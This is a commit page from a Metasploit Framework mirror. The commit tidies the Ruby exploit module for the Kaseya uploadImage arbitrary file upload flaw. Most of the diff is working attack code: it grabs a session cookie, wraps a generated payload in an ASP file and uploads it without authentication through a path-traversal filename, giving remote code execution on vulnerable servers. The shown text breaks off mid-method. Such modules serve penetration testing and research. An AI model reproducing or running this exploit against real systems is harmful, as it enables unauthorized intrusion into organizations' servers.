infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do minor clean up for kaseya_uploadimage_file_upload

bug/bundler_fix
jvazquez-r7 2013-12-03 09:34:25 -06:00
parent 21bb8fd25a
commit 2606a6ff0e
1 changed files with 29 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

55
modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
View File

@ -17,24 +17,25 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Kaseya uploadImage Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability found in Kaseya versions below 6.3.0.2.
A malicious user can upload an ASP file to an arbitrary directory without authentication, leading to arbitrary code execution.
Code executed in this manner runs under an IUSR account.
This module exploits an arbitrary file upload vulnerability found in Kaseya versions below
6.3.0.2. A malicious user can upload an ASP file to an arbitrary directory without previous
authentication, leading to arbitrary code execution with IUSR privileges.
},
'Author' =>
[
'Thomas Hibbert <thomas.hibbert@security-assessment.com' # Vulnerability discovery and MSF module
'Thomas Hibbert <thomas.hibbert@security-assessment.com' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' => [
['URL', 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf'],
['OSVDB', '99984'],
['BID', '63782'],
['EDB', '29675']
],
'Payload' => {},
'References' =>
[
['OSVDB', '99984'],
['BID', '63782'],
['EDB', '29675'],
['URL', 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf']
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Privileged' => false,
'Targets' =>
[
[ 'Kaseya KServer / Windows', {} ],
@ -50,8 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
# the vuln was patched by removing uploadImage.asp. if the page is there, calling it without params will return 500, else 404
if not res or res.code != 500
unless res and res.code == 500
return Exploit::CheckCode::Unknown
end
@ -59,34 +59,37 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@payload_name = "#{rand_text_alpha_lower(8)}.asp"
exe = generate_payload_exe
asp = Msf::Util::EXE.to_exe_asp(exe)
post_data = Rex::MIME::Message.new
post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"#{@payload_name}")
data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{peer} - Getting cookie...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("SystemTab", "uploadImage.asp")
})
cookie = res.get_cookies
unless res and res.code == 500 and res.headers and res.headers.include?('Set-Cookie')
fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to get cookie")
end
cookie = res.get_cookies
@payload_name = "#{rand_text_alpha_lower(8)}.asp"
exe = generate_payload_exe
asp = Msf::Util::EXE.to_exe_asp(exe)
post_data = Rex::MIME::Message.new
post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"#{@payload_name}")
data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{peer} - Uploading payload...")
res = send_request_cgi({
"method" => "POST",
"uri" => normalize_uri("SystemTab","uploadImage.asp"),
"uri" => normalize_uri("SystemTab", "uploadImage.asp"),
"vars_get" => {
"filename" => "..\\..\\..\\..\\#{@payload_name}"
},
},
"data" => data,
"ctype" => "multipart/form-data; boundary=#{post_data.bound}",
"cookie" => cookie
})
if not res or res.code != 200
unless res and res.code == 200
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
end